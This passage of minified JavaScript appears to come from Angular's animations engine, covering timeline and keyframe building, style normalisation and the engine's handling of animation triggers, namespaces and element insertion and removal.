gi(3202,!1)}()):0==r&&(te=1/(Y-1));const pe=Y-1,Re=e.currentTime,Fe=e.currentAnimateTimings,Ne=Fe.duration;return q.forEach((et,ut)=>{const Ze=te>0?ut==pe?1:te*ut:c[ut],yt=Ze*Ne;e.currentTime=Re+Fe.delay+yt,Fe.duration=yt,this._validateStyleAst(et,e),et.offset=Ze,i.styles.push(et)}),i}visitReference(a,e){return{type:8,animation:jl(this,my(a.animation),e),options:sg(a.options)}}visitAnimateChild(a,e){return e.depCount++,{type:9,options:sg(a.options)}}visitAnimateRef(a,e){return{type:10,animation:this.visitReference(a.animation,e),options:sg(a.options)}}visitQuery(a,e){const i=e.currentQuerySelector,n=a.options||{};e.queryCount++,e.currentQuery=a;const[r,c]=function ele(t){const a=!!t.split(/\s*,\s*/).find(e=>":self"==e);return a&&(t=t.replace(Jce,"")),t=t.replace(/@\*/g,m4).replace(/@\w+/g,e=>m4+"-"+e.slice(1)).replace(/:animating/g,R6),[t,a]}(a.selector);e.currentQuerySelector=i.length?i+" "+r:r,Gl(e.collectedStyles,e.currentQuerySelector,new Map);const d=jl(this,my(a.animation),e);return e.currentQuery=null,e.currentQuerySelector=i,{type:11,selector:r,limit:n.limit||0,optional:!!n.optional,includeSelf:c,animation:d,originalSelector:a.selector,options:sg(a.options)}}visitStagger(a,e){e.currentQuery||e.errors.push(function fce(){return new gi(3013,!1)}());const i="full"===a.timings?{duration:0,delay:0,easing:"full"}:u4(a.timings,e.errors,!0);return{type:12,animation:jl(this,my(a.animation),e),timings:i,options:null}}}class ile{constructor(a){this.errors=a,this.queryCount=0,this.depCount=0,this.currentTransition=null,this.currentQuery=null,this.currentQuerySelector=null,this.currentAnimateTimings=null,this.currentTime=0,this.collectedStyles=new Map,this.options=null,this.unsupportedCSSPropertiesFound=new Set}}function sg(t){return t?(t=dy(t)).params&&(t.params=function tle(t){return t?dy(t):null}(t.params)):t={},t}function N6(t,a,e){return{duration:t,delay:a,easing:e}}function L6(t,a,e,i,n,r,c=null,d=!1){return{type:1,element:t,keyframes:a,preStyleProps:e,postStyleProps:i,duration:n,delay:r,totalTime:n+r,easing:c,subTimeline:d}}class y4{constructor(){this._map=new Map}get(a){return this._map.get(a)||[]}append(a,e){let i=this._map.get(a);i||this._map.set(a,i=[]),i.push(...e)}has(a){return this._map.has(a)}clear(){this._map.clear()}}const sle=new RegExp(":enter","g"),lle=new RegExp(":leave","g");function z6(t,a,e,i,n,r=new Map,c=new Map,d,T,k=[]){return(new dle).buildKeyframes(t,a,e,i,n,r,c,d,T,k)}class dle{buildKeyframes(a,e,i,n,r,c,d,T,k,q=[]){k=k||new y4;const Y=new W6(a,e,k,n,r,q,[]);Y.options=T;const te=T.delay?Ih(T.delay):0;Y.currentTimeline.delayNextStep(te),Y.currentTimeline.setStyles([c],null,Y.errors,T),jl(this,i,Y);const pe=Y.timelines.filter(Re=>Re.containsAnimation());if(pe.length&&d.size){let Re;for(let Fe=pe.length-1;Fe>=0;Fe--){const Ne=pe[Fe];if(Ne.element===e){Re=Ne;break}}Re&&!Re.allowOnlyTimelineStyles()&&Re.setStyles([d],null,Y.errors,T)}return pe.length?pe.map(Re=>Re.buildKeyframes()):[L6(e,[],[],[],0,te,"",!1)]}visitTrigger(a,e){}visitState(a,e){}visitTransition(a,e){}visitAnimateChild(a,e){const i=e.subInstructions.get(e.element);if(i){const n=e.createSubContext(a.options),r=e.currentTimeline.currentTime,c=this._visitSubInstructions(i,n,n.options);r!=c&&e.transformIntoNewTimeline(c)}e.previousNode=a}visitAnimateRef(a,e){const i=e.createSubContext(a.options);i.transformIntoNewTimeline(),this._applyAnimationRefDelays([a.options,a.animation.options],e,i),this.visitReference(a.animation,i),e.transformIntoNewTimeline(i.currentTimeline.currentTime),e.previousNode=a}_applyAnimationRefDelays(a,e,i){var n;for(const r of a){const c=null==r?void 0:r.delay;if(c){const d="number"==typeof c?c:Ih(uy(c,null!==(n=null==r?void 0:r.params)&&void 0!==n?n:{},e.errors));i.delayNextStep(d)}}}_visitSubInstructions(a,e,i){let r=e.currentTimeline.currentTime;const c=null!=i.duration?Ih(i.duration):null,d=null!=i.delay?Ih(i.delay):null;return 0!==c&&a.forEach(T=>{const k=e.appendInstructionToTimeline(T,c,d);r=Math.max(r,k.duration+k.delay)}),r}visitReference(a,e){e.updateOptions(a.options,!0),jl(this,a.animation,e),e.previousNode=a}visitSequence(a,e){const i=e.subContextCount;let n=e;const r=a.options;if(r&&(r.params||r.delay)&&(n=e.createSubContext(r),n.transformIntoNewTimeline(),null!=r.delay)){6==n.previousNode.type&&(n.currentTimeline.snapshotCurrentStyles(),n.previousNode=b4);const c=Ih(r.delay);n.delayNextStep(c)}a.steps.length&&(a.steps.forEach(c=>jl(this,c,n)),n.currentTimeline.applyStylesToKeyframe(),n.subContextCount>i&&n.transformIntoNewTimeline()),e.previousNode=a}visitGroup(a,e){const i=[];let n=e.currentTimeline.currentTime;const r=a.options&&a.options.delay?Ih(a.options.delay):0;a.steps.forEach(c=>{const d=e.createSubContext(a.options);r&&d.delayNextStep(r),jl(this,c,d),n=Math.max(n,d.currentTimeline.currentTime),i.push(d.currentTimeline)}),i.forEach(c=>e.currentTimeline.mergeTimelineCollectedStyles(c)),e.transformIntoNewTimeline(n),e.previousNode=a}_visitTiming(a,e){if(a.dynamic){const i=a.strValue;return u4(e.params?uy(i,e.params,e.errors):i,e.errors)}return{duration:a.duration,delay:a.delay,easing:a.easing}}visitAnimate(a,e){const i=e.currentAnimateTimings=this._visitTiming(a.timings,e),n=e.currentTimeline;i.delay&&(e.incrementTime(i.delay),n.snapshotCurrentStyles());const r=a.style;5==r.type?this.visitKeyframes(r,e):(e.incrementTime(i.duration),this.visitStyle(r,e),n.applyStylesToKeyframe()),e.currentAnimateTimings=null,e.previousNode=a}visitStyle(a,e){const i=e.currentTimeline,n=e.currentAnimateTimings;!n&&i.hasCurrentStyleProperties()&&i.forwardFrame();const r=n&&n.easing||a.easing;a.isEmptyStep?i.applyEmptyStep(r):i.setStyles(a.styles,r,e.errors,e.options),e.previousNode=a}visitKeyframes(a,e){const i=e.currentAnimateTimings,n=e.currentTimeline.duration,r=i.duration,d=e.createSubContext().currentTimeline;d.easing=i.easing,a.styles.forEach(T=>{d.forwardTime((T.offset||0)*r),d.setStyles(T.styles,T.easing,e.errors,e.options),d.applyStylesToKeyframe()}),e.currentTimeline.mergeTimelineCollectedStyles(d),e.transformIntoNewTimeline(n+r),e.previousNode=a}visitQuery(a,e){const i=e.currentTimeline.currentTime,n=a.options||{},r=n.delay?Ih(n.delay):0;r&&(6===e.previousNode.type||0==i&&e.currentTimeline.hasCurrentStyleProperties())&&(e.currentTimeline.snapshotCurrentStyles(),e.previousNode=b4);let c=i;const d=e.invokeQuery(a.selector,a.originalSelector,a.limit,a.includeSelf,!!n.optional,e.errors);e.currentQueryTotal=d.length;let T=null;d.forEach((k,q)=>{e.currentQueryIndex=q;const Y=e.createSubContext(a.options,k);r&&Y.delayNextStep(r),k===e.element&&(T=Y.currentTimeline),jl(this,a.animation,Y),Y.currentTimeline.applyStylesToKeyframe(),c=Math.max(c,Y.currentTimeline.currentTime)}),e.currentQueryIndex=0,e.currentQueryTotal=0,e.transformIntoNewTimeline(c),T&&(e.currentTimeline.mergeTimelineCollectedStyles(T),e.currentTimeline.snapshotCurrentStyles()),e.previousNode=a}visitStagger(a,e){const i=e.parentContext,n=e.currentTimeline,r=a.timings,c=Math.abs(r.duration),d=c*(e.currentQueryTotal-1);let T=c*e.currentQueryIndex;switch(r.duration<0?"reverse":r.easing){case"reverse":T=d-T;break;case"full":T=i.currentStaggerTime}const q=e.currentTimeline;T&&q.delayNextStep(T);const Y=q.currentTime;jl(this,a.animation,e),e.previousNode=a,i.currentStaggerTime=n.currentTime-Y+(n.startTime-i.currentTimeline.startTime)}}const b4={};class W6{constructor(a,e,i,n,r,c,d,T){this._driver=a,this.element=e,this.subInstructions=i,this._enterClassName=n,this._leaveClassName=r,this.errors=c,this.timelines=d,this.parentContext=null,this.currentAnimateTimings=null,this.previousNode=b4,this.subContextCount=0,this.options={},this.currentQueryIndex=0,this.currentQueryTotal=0,this.currentStaggerTime=0,this.currentTimeline=T||new M4(this._driver,e,0),d.push(this.currentTimeline)}get params(){return this.options.params}updateOptions(a,e){if(!a)return;const i=a;let n=this.options;null!=i.duration&&(n.duration=Ih(i.duration)),null!=i.delay&&(n.delay=Ih(i.delay));const r=i.params;if(r){let c=n.params;c||(c=this.options.params={}),Object.keys(r).forEach(d=>{(!e||!c.hasOwnProperty(d))&&(c[d]=uy(r[d],c,this.errors))})}}_copyOptions(){const a={};if(this.options){const e=this.options.params;if(e){const i=a.params={};Object.keys(e).forEach(n=>{i[n]=e[n]})}}return a}createSubContext(a=null,e,i){const n=e||this.element,r=new W6(this._driver,n,this.subInstructions,this._enterClassName,this._leaveClassName,this.errors,this.timelines,this.currentTimeline.fork(n,i||0));return r.previousNode=this.previousNode,r.currentAnimateTimings=this.currentAnimateTimings,r.options=this._copyOptions(),r.updateOptions(a),r.currentQueryIndex=this.currentQueryIndex,r.currentQueryTotal=this.currentQueryTotal,r.parentContext=this,this.subContextCount++,r}transformIntoNewTimeline(a){return this.previousNode=b4,this.currentTimeline=this.currentTimeline.fork(this.element,a),this.timelines.push(this.currentTimeline),this.currentTimeline}appendInstructionToTimeline(a,e,i){const n={duration:null!=e?e:a.duration,delay:this.currentTimeline.currentTime+(null!=i?i:0)+a.delay,easing:""},r=new mle(this._driver,a.element,a.keyframes,a.preStyleProps,a.postStyleProps,n,a.stretchStartingKeyframe);return this.timelines.push(r),n}incrementTime(a){this.currentTimeline.forwardTime(this.currentTimeline.duration+a)}delayNextStep(a){a>0&&this.currentTimeline.delayNextStep(a)}invokeQuery(a,e,i,n,r,c){let d=[];if(n&&d.push(this.element),a.length>0){a=(a=a.replace(sle,"."+this._enterClassName)).replace(lle,"."+this._leaveClassName);let k=this._driver.query(this.element,a,1!=i);0!==i&&(k=i<0?k.slice(k.length+i,k.length):k.slice(0,i)),d.push(...k)}return!r&&0==d.length&&c.push(function pce(t){return new gi(3014,!1)}()),d}}class M4{constructor(a,e,i,n){this._driver=a,this.element=e,this.startTime=i,this._elementTimelineStylesLookup=n,this.duration=0,this._previousKeyframe=new Map,this._currentKeyframe=new Map,this._keyframes=new Map,this._styleSummary=new Map,this._localTimelineStyles=new Map,this._pendingStyles=new Map,this._backFill=new Map,this._currentEmptyStepKeyframe=null,this._elementTimelineStylesLookup||(this._elementTimelineStylesLookup=new Map),this._globalTimelineStyles=this._elementTimelineStylesLookup.get(e),this._globalTimelineStyles||(this._globalTimelineStyles=this._localTimelineStyles,this._elementTimelineStylesLookup.set(e,this._localTimelineStyles)),this._loadKeyframe()}containsAnimation(){switch(this._keyframes.size){case 0:return!1;case 1:return this.hasCurrentStyleProperties();default:return!0}}hasCurrentStyleProperties(){return this._currentKeyframe.size>0}get currentTime(){return this.startTime+this.duration}delayNextStep(a){const e=1===this._keyframes.size&&this._pendingStyles.size;this.duration||e?(this.forwardTime(this.currentTime+a),e&&this.snapshotCurrentStyles()):this.startTime+=a}fork(a,e){return this.applyStylesToKeyframe(),new M4(this._driver,a,e||this.currentTime,this._elementTimelineStylesLookup)}_loadKeyframe(){this._currentKeyframe&&(this._previousKeyframe=this._currentKeyframe),this._currentKeyframe=this._keyframes.get(this.duration),this._currentKeyframe||(this._currentKeyframe=new Map,this._keyframes.set(this.duration,this._currentKeyframe))}forwardFrame(){this.duration+=1,this._loadKeyframe()}forwardTime(a){this.applyStylesToKeyframe(),this.duration=a,this._loadKeyframe()}_updateStyle(a,e){this._localTimelineStyles.set(a,e),this._globalTimelineStyles.set(a,e),this._styleSummary.set(a,{time:this.currentTime,value:e})}allowOnlyTimelineStyles(){return this._currentEmptyStepKeyframe!==this._currentKeyframe}applyEmptyStep(a){a&&this._previousKeyframe.set("easing",a);for(let[e,i]of this._globalTimelineStyles)this._backFill.set(e,i||wh),this._currentKeyframe.set(e,wh);this._currentEmptyStepKeyframe=this._currentKeyframe}setStyles(a,e,i,n){var r;e&&this._previousKeyframe.set("easing",e);const c=n&&n.params||{},d=function ule(t,a){const e=new Map;let i;return t.forEach(n=>{if("*"===n){i=i||a.keys();for(let r of i)e.set(r,wh)}else tp(n,e)}),e}(a,this._globalTimelineStyles);for(let[T,k]of d){const q=uy(k,c,i);this._pendingStyles.set(T,q),this._localTimelineStyles.has(T)||this._backFill.set(T,null!==(r=this._globalTimelineStyles.get(T))&&void 0!==r?r:wh),this._updateStyle(T,q)}}applyStylesToKeyframe(){0!=this._pendingStyles.size&&(this._pendingStyles.forEach((a,e)=>{this._currentKeyframe.set(e,a)}),this._pendingStyles.clear(),this._localTimelineStyles.forEach((a,e)=>{this._currentKeyframe.has(e)||this._currentKeyframe.set(e,a)}))}snapshotCurrentStyles(){for(let[a,e]of this._localTimelineStyles)this._pendingStyles.set(a,e),this._updateStyle(a,e)}getFinalKeyframe(){return this._keyframes.get(this.duration)}get properties(){const a=[];for(let e in this._currentKeyframe)a.push(e);return a}mergeTimelineCollectedStyles(a){a._styleSummary.forEach((e,i)=>{const n=this._styleSummary.get(i);(!n||e.time>n.time)&&this._updateStyle(i,e.value)})}buildKeyframes(){this.applyStylesToKeyframe();const a=new Set,e=new Set,i=1===this._keyframes.size&&0===this.duration;let n=[];this._keyframes.forEach((d,T)=>{const k=tp(d,new Map,this._backFill);k.forEach((q,Y)=>{"!"===q?a.add(Y):q===wh&&e.add(Y)}),i||k.set("offset",T/this.duration),n.push(k)});const r=a.size?h4(a.values()):[],c=e.size?h4(e.values()):[];if(i){const d=n[0],T=new Map(d);d.set("offset",0),T.set("offset",1),n=[d,T]}return L6(this.element,n,r,c,this.duration,this.startTime,this.easing,!1)}}class mle extends M4{constructor(a,e,i,n,r,c,d=!1){super(a,e,c.delay),this.keyframes=i,this.preStyleProps=n,this.postStyleProps=r,this._stretchStartingKeyframe=d,this.timings={duration:c.duration,delay:c.delay,easing:c.easing}}containsAnimation(){return this.keyframes.length>1}buildKeyframes(){let a=this.keyframes,{delay:e,duration:i,easing:n}=this.timings;if(this._stretchStartingKeyframe&&e){const r=[],c=i+e,d=e/c,T=tp(a[0]);T.set("offset",0),r.push(T);const k=tp(a[0]);k.set("offset",yO(d)),r.push(k);const q=a.length-1;for(let Y=1;Y<=q;Y++){let te=tp(a[Y]);const pe=te.get("offset");te.set("offset",yO((e+pe*i)/c)),r.push(te)}i=c,e=0,n="",a=r}return L6(this.element,a,this.preStyleProps,this.postStyleProps,i,e,n,!0)}}function yO(t,a=3){const e=Math.pow(10,a-1);return Math.round(t*e)/e}class F6{}const hle=new Set(["width","height","minWidth","minHeight","maxWidth","maxHeight","left","top","bottom","right","fontSize","outlineWidth","outlineOffset","paddingTop","paddingLeft","paddingBottom","paddingRight","marginTop","marginLeft","marginBottom","marginRight","borderRadius","borderWidth","borderTopWidth","borderLeftWidth","borderRightWidth","borderBottomWidth","textIndent","perspective"]);class fle extends F6{normalizePropertyName(a,e){return P6(a)}normalizeStyleValue(a,e,i,n){let r="";const c=i.toString().trim();if(hle.has(e)&&0!==i&&"0"!==i)if("number"==typeof i)r="px";else{const d=i.match(/^[+-]?[\d\.]+([a-z]*)$/);d&&0==d[1].length&&n.push(function nce(t,a){return new gi(3005,!1)}())}return c+r}}function bO(t,a,e,i,n,r,c,d,T,k,q,Y,te){return{type:0,element:t,triggerName:a,isRemovalTransition:n,fromState:e,fromStyles:r,toState:i,toStyles:c,timelines:d,queriedElements:T,preStyleProps:k,postStyleProps:q,totalTime:Y,errors:te}}const V6={};class MO{constructor(a,e,i){this._triggerName=a,this.ast=e,this._stateStyles=i}match(a,e,i,n){return function ple(t,a,e,i,n){return t.some(r=>r(a,e,i,n))}(this.ast.matchers,a,e,i,n)}buildStyles(a,e,i){let n=this._stateStyles.get("*");return void 0!==a&&(n=this._stateStyles.get(null==a?void 0:a.toString())||n),n?n.buildStyles(e,i):new Map}build(a,e,i,n,r,c,d,T,k,q){var Y;const te=[],pe=this.ast.options&&this.ast.options.params||V6,Fe=this.buildStyles(i,d&&d.params||V6,te),Ne=T&&T.params||V6,et=this.buildStyles(n,Ne,te),ut=new Set,Ze=new Map,yt=new Map,It="void"===n,St={params:_le(Ne,pe),delay:null===(Y=this.ast.options)||void 0===Y?void 0:Y.delay},Nt=q?[]:z6(a,e,this.ast.animation,r,c,Fe,et,St,k,te);let oi=0;if(Nt.forEach(vi=>{oi=Math.max(vi.duration+vi.delay,oi)}),te.length)return bO(e,this._triggerName,i,n,It,Fe,et,[],[],Ze,yt,oi,te);Nt.forEach(vi=>{const xi=vi.element,Za=Gl(Ze,xi,new Set);vi.preStyleProps.forEach(en=>Za.add(en));const wa=Gl(yt,xi,new Set);vi.postStyleProps.forEach(en=>wa.add(en)),xi!==e&&ut.add(xi)});const Ai=h4(ut.values());return bO(e,this._triggerName,i,n,It,Fe,et,Nt,Ai,Ze,yt,oi)}}function _le(t,a){const e=dy(a);for(const i in t)t.hasOwnProperty(i)&&null!=t[i]&&(e[i]=t[i]);return e}class gle{constructor(a,e,i){this.styles=a,this.defaultParams=e,this.normalizer=i}buildStyles(a,e){const i=new Map,n=dy(this.defaultParams);return Object.keys(a).forEach(r=>{const c=a[r];null!==c&&(n[r]=c)}),this.styles.styles.forEach(r=>{"string"!=typeof r&&r.forEach((c,d)=>{c&&(c=uy(c,n,e));const T=this.normalizer.normalizePropertyName(d,e);c=this.normalizer.normalizeStyleValue(d,T,c,e),i.set(T,c)})}),i}}class yle{constructor(a,e,i){this.name=a,this.ast=e,this._normalizer=i,this.transitionFactories=[],this.states=new Map,e.states.forEach(n=>{this.states.set(n.name,new gle(n.style,n.options&&n.options.params||{},i))}),vO(this.states,"true","1"),vO(this.states,"false","0"),e.transitions.forEach(n=>{this.transitionFactories.push(new MO(a,n,this.states))}),this.fallbackTransition=function ble(t,a,e){return new MO(t,{type:1,animation:{type:2,steps:[],options:null},matchers:[(c,d)=>!0],options:null,queryCount:0,depCount:0},a)}(a,this.states)}get containsQueries(){return this.ast.queryCount>0}matchTransition(a,e,i,n){return this.transitionFactories.find(c=>c.match(a,e,i,n))||null}matchStyles(a,e,i){return this.fallbackTransition.buildStyles(a,e,i)}}function vO(t,a,e){t.has(a)?t.has(e)||t.set(e,t.get(a)):t.has(e)&&t.set(a,t.get(e))}const Mle=new y4;class vle{constructor(a,e,i){this.bodyNode=a,this._driver=e,this._normalizer=i,this._animations=new Map,this._playersById=new Map,this.players=[]}register(a,e){const i=[],r=O6(this._driver,e,i,[]);if(i.length)throw function vce(t){return new gi(3503,!1)}();this._animations.set(a,r)}_buildPlayer(a,e,i){const n=a.element,r=eO(0,this._normalizer,0,a.keyframes,e,i);return this._driver.animate(n,r,a.duration,a.delay,a.easing,[],!0)}create(a,e,i={}){const n=[],r=this._animations.get(a);let c;const d=new Map;if(r?(c=z6(this._driver,e,r,I6,l4,new Map,new Map,i,Mle,n),c.forEach(q=>{const Y=Gl(d,q.element,new Map);q.postStyleProps.forEach(te=>Y.set(te,null))})):(n.push(function Ace(){return new gi(3300,!1)}()),c=[]),n.length)throw function Tce(t){return new gi(3504,!1)}();d.forEach((q,Y)=>{q.forEach((te,pe)=>{q.set(pe,this._driver.computeStyle(Y,pe,wh))})});const k=ep(c.map(q=>{const Y=d.get(q.element);return this._buildPlayer(q,new Map,Y)}));return this._playersById.set(a,k),k.onDestroy(()=>this.destroy(a)),this.players.push(k),k}destroy(a){const e=this._getPlayer(a);e.destroy(),this._playersById.delete(a);const i=this.players.indexOf(e);i>=0&&this.players.splice(i,1)}_getPlayer(a){const e=this._playersById.get(a);if(!e)throw function Ece(t){return new gi(3301,!1)}();return e}listen(a,e,i,n){const r=E6(e,"","","");return A6(this._getPlayer(a),i,r,n),()=>{}}command(a,e,i,n){if("register"==i)return void this.register(a,n[0]);if("create"==i)return void this.create(a,e,n[0]||{});const r=this._getPlayer(a);switch(i){case"play":r.play();break;case"pause":r.pause();break;case"reset":r.reset();break;case"restart":r.restart();break;case"finish":r.finish();break;case"init":r.init();break;case"setPosition":r.setPosition(parseFloat(n[0]));break;case"destroy":this.destroy(a)}}}const AO="ng-animate-queued",B6="ng-animate-disabled",xle=[],TO={namespaceId:"",setForRemoval:!1,setForMove:!1,hasAnimation:!1,removedBeforeQueried:!1},wle={namespaceId:"",setForMove:!1,setForRemoval:!1,hasAnimation:!1,removedBeforeQueried:!0},vd="__ng_removed";class H6{constructor(a,e=""){this.namespaceId=e;const i=a&&a.hasOwnProperty("value");if(this.value=function kle(t){return null!=t?t:null}(i?a.value:a),i){const r=dy(a);delete r.value,this.options=r}else this.options={};this.options.params||(this.options.params={})}get params(){return this.options.params}absorbOptions(a){const e=a.params;if(e){const i=this.options.params;Object.keys(e).forEach(n=>{null==i[n]&&(i[n]=e[n])})}}}const hy="void",U6=new H6(hy);class Ile{constructor(a,e,i){this.id=a,this.hostElement=e,this._engine=i,this.players=[],this._triggers=new Map,this._queue=[],this._elementListeners=new Map,this._hostClassName="ng-tns-"+a,Ad(e,this._hostClassName)}listen(a,e,i,n){if(!this._triggers.has(e))throw function Dce(t,a){return new gi(3302,!1)}();if(null==i||0==i.length)throw function xce(t){return new gi(3303,!1)}();if(!function Ple(t){return"start"==t||"done"==t}(i))throw function wce(t,a){return new gi(3400,!1)}();const r=Gl(this._elementListeners,a,[]),c={name:e,phase:i,callback:n};r.push(c);const d=Gl(this._engine.statesByElement,a,new Map);return d.has(e)||(Ad(a,d4),Ad(a,d4+"-"+e),d.set(e,U6)),()=>{this._engine.afterFlush(()=>{const T=r.indexOf(c);T>=0&&r.splice(T,1),this._triggers.has(e)||d.delete(e)})}}register(a,e){return!this._triggers.has(a)&&(this._triggers.set(a,e),!0)}_getTrigger(a){const e=this._triggers.get(a);if(!e)throw function Ice(t){return new gi(3401,!1)}();return e}trigger(a,e,i,n=!0){const r=this._getTrigger(e),c=new q6(this.id,e,a);let d=this._engine.statesByElement.get(a);d||(Ad(a,d4),Ad(a,d4+"-"+e),this._engine.statesByElement.set(a,d=new Map));let T=d.get(e);const k=new H6(i,this.id);if(!(i&&i.hasOwnProperty("value"))&&T&&k.absorbOptions(T.options),d.set(e,k),T||(T=U6),k.value!==hy&&T.value===k.value){if(!function Lle(t,a){const e=Object.keys(t),i=Object.keys(a);if(e.length!=i.length)return!1;for(let n=0;n<e.length;n++){const r=e[n];if(!a.hasOwnProperty(r)||t[r]!==a[r])return!1}return!0}(T.params,k.params)){const Fe=[],Ne=r.matchStyles(T.value,T.params,Fe),et=r.matchStyles(k.value,k.params,Fe);Fe.length?this._engine.reportError(Fe):this._engine.afterFlush(()=>{rg(a,Ne),cu(a,et)})}return}const te=Gl(this._engine.playersByElement,a,[]);te.forEach(Fe=>{Fe.namespaceId==this.id&&Fe.triggerName==e&&Fe.queued&&Fe.destroy()});let pe=r.matchTransition(T.value,k.value,a,k.params),Re=!1;if(!pe){if(!n)return;pe=r.fallbackTransition,Re=!0}return this._engine.totalQueuedPlayers++,this._queue.push({element:a,triggerName:e,transition:pe,fromState:T,toState:k,player:c,isFallbackTransition:Re}),Re||(Ad(a,AO),c.onStart(()=>{g1(a,AO)})),c.onDone(()=>{let Fe=this.players.indexOf(c);Fe>=0&&this.players.splice(Fe,1);const Ne=this._engine.playersByElement.get(a);if(Ne){let et=Ne.indexOf(c);et>=0&&Ne.splice(et,1)}}),this.players.push(c),te.push(c),c}deregister(a){this._triggers.delete(a),this._engine.statesByElement.forEach(e=>e.delete(a)),this._elementListeners.forEach((e,i)=>{this._elementListeners.set(i,e.filter(n=>n.name!=a))})}clearElementCache(a){this._engine.statesByElement.delete(a),this._elementListeners.delete(a);const e=this._engine.playersByElement.get(a);e&&(e.forEach(i=>i.destroy()),this._engine.playersByElement.delete(a))}_signalRemovalForInnerTriggers(a,e){const i=this._engine.driver.query(a,m4,!0);i.forEach(n=>{if(n[vd])return;const r=this._engine.fetchNamespacesByElement(n);r.size?r.forEach(c=>c.triggerLeaveAnimation(n,e,!1,!0)):this.clearElementCache(n)}),this._engine.afterFlushAnimationsDone(()=>i.forEach(n=>this.clearElementCache(n)))}triggerLeaveAnimation(a,e,i,n){const r=this._engine.statesByElement.get(a),c=new Map;if(r){const d=[];if(r.forEach((T,k)=>{if(c.set(k,T.value),this._triggers.has(k)){const q=this.trigger(a,k,hy,n);q&&d.push(q)}}),d.length)return this._engine.markElementAsRemoved(this.id,a,!0,e,c),i&&ep(d).onDone(()=>this._engine.processLeaveNode(a)),!0}return!1}prepareLeaveAnimationListeners(a){const e=this._elementListeners.get(a),i=this._engine.statesByElement.get(a);if(e&&i){const n=new Set;e.forEach(r=>{const c=r.name;if(n.has(c))return;n.add(c);const T=this._triggers.get(c).fallbackTransition,k=i.get(c)||U6,q=new H6(hy),Y=new q6(this.id,c,a);this._engine.totalQueuedPlayers++,this._queue.push({element:a,triggerName:c,transition:T,fromState:k,toState:q,player:Y,isFallbackTransition:!0})})}}removeNode(a,e){const i=this._engine;if(a.childElementCount&&this._signalRemovalForInnerTriggers(a,e),this.triggerLeaveAnimation(a,e,!0))return;let n=!1;if(i.totalAnimations){const r=i.players.length?i.playersByQueriedElement.get(a):[];if(r&&r.length)n=!0;else{let c=a;for(;c=c.parentNode;)if(i.statesByElement.get(c)){n=!0;break}}}if(this.prepareLeaveAnimationListeners(a),n)i.markElementAsRemoved(this.id,a,!1,e);else{const r=a[vd];(!r||r===TO)&&(i.afterFlush(()=>this.clearElementCache(a)),i.destroyInnerAnimations(a),i._onRemovalComplete(a,e))}}insertNode(a,e){Ad(a,this._hostClassName)}drainQueuedTransitions(a){const e=[];return this._queue.forEach(i=>{const n=i.player;if(n.destroyed)return;const r=i.element,c=this._elementListeners.get(r);c&&c.forEach(d=>{if(d.name==i.triggerName){const T=E6(r,i.triggerName,i.fromState.value,i.toState.value);T._data=a,A6(i.player,d.phase,T,d.callback)}}),n.markedForDestroy?this._engine.afterFlush(()=>{n.destroy()}):e.push(i)}),this._queue=[],e.sort((i,n)=>{const r=i.transition.ast.depCount,c=n.transition.ast.depCount;return 0==r||0==c?r-c:this._engine.driver.containsElement(i.element,n.element)?1:-1})}destroy(a){this.players.forEach(e=>e.destroy()),this._signalRemovalForInnerTriggers(this.hostElement,a)}elementContainsData(a){let e=!1;return this._elementListeners.has(a)&&(e=!0),e=!!this._queue.find(i=>i.element===a)||e,e}}class Rle{constructor(a,e,i){this.bodyNode=a,this.driver=e,this._normalizer=i,this.players=[],this.newHostElements=new Map,this.playersByElement=new Map,this.playersByQueriedElement=new Map,this.statesByElement=new Map,this.disabledNodes=new Set,this.totalAnimations=0,this.totalQueuedPlayers=0,this._namespaceLookup={},this._namespaceList=[],this._flushFns=[],this._whenQuietFns=[],this.namespacesByHostElement=new Map,this.collectedEnterElements=[],this.collectedLeaveElements=[],this.onRemovalComplete=(n,r)=>{}}_onRemovalComplete(a,e){this.onRemovalComplete(a,e)}get queuedPlayers(){const a=[];return this._namespaceList.forEach(e=>{e.players.forEach(i=>{i.queued&&a.push(i)})}),a}createNamespace(a,e){const i=new Ile(a,e,this);return this.bodyNode&&this.driver.containsElement(this.bodyNode,e)?this._balanceNamespaceList(i,e):(this.newHostElements.set(e,i),this.collectEnterElement(e)),this._namespaceLookup[a]=i}_balanceNamespaceList(a,e){const i=this._namespaceList,n=this.namespacesByHostElement;if(i.length-1>=0){let c=!1,d=this.driver.getParentElement(e);for(;d;){const T=n.get(d);if(T){const k=i.indexOf(T);i.splice(k+1,0,a),c=!0;break}d=this.driver.getParentElement(d)}c||i.unshift(a)}else i.push(a);return n.set(e,a),a}register(a,e){let i=this._namespaceLookup[a];return i||(i=this.createNamespace(a,e)),i}registerTrigger(a,e,i){let n=this._namespaceLookup[a];n&&n.register(e,i)&&this.totalAnimations++}destroy(a,e){if(!a)return;const i=this._fetchNamespace(a);this.afterFlush(()=>{this.namespacesByHostElement.delete(i.hostElement),delete this._namespaceLookup[a];const n=this._namespaceList.indexOf(i);n>=0&&this._namespaceList.splice(n,1)}),this.afterFlushAnimationsDone(()=>i.destroy(e))}_fetchNamespace(a){return this._namespaceLookup[a]}fetchNamespacesByElement(a){const e=new Set,i=this.statesByElement.get(a);if(i)for(let n of i.values())if(n.namespaceId){const r=this._fetchNamespace(n.namespaceId);r&&e.add(r)}return e}trigger(a,e,i,n){if(v4(e)){const r=this._fetchNamespace(a);if(r)return r.trigger(e,i,n),!0}return!1}insertNode(a,e,i,n){if(!v4(e))return;const r=e[vd];if(r&&r.setForRemoval){r.setForRemoval=!1,r.setForMove=!0;const c=this.collectedLeaveElements.indexOf(e);c>=0&&this.collectedLeaveElements.splice(c,1)}if(a){const c=this._fetchNamespace(a);c&&c.insertNode(e,i)}n&&this.collectEnterElement(e)}collectEnterElement(a){this.collectedEnterElements.push(a)}markElementAsDisabled(a,e){e?this.disabledNodes.has(a)||(this.disabledNodes.add(a),Ad(a,B6)):this.disabledNodes.has(a)&&(this.disabledNodes.delete(a),g1(a,B6))}removeNode(a,e,i,n){if(v4(e)){const r=a?this._fetchNamespace(a):null;if(r?r.removeNode(e,n):this.markElementAsRemoved(a,e,!1,n),i){const c=this.namespacesByHostElement.get(e);c&&c.id!==a&&c.removeNode(e,n)}}else this._onRemovalComplete(e,n)}markElementAsRemoved(a,e,i,n,r){this.collectedLeaveElements.push(e),e[vd]={namespaceId:a,setForRemoval:n,hasAnimation:i,removedBeforeQueried:!1,previousTriggersValues:r}}listen(a,e,i,n,r){return v4(e)?this._fetchNamespace(a).listen(e,i,n,r):()=>{}}_buildInstruction(a,e,i,n,r){return 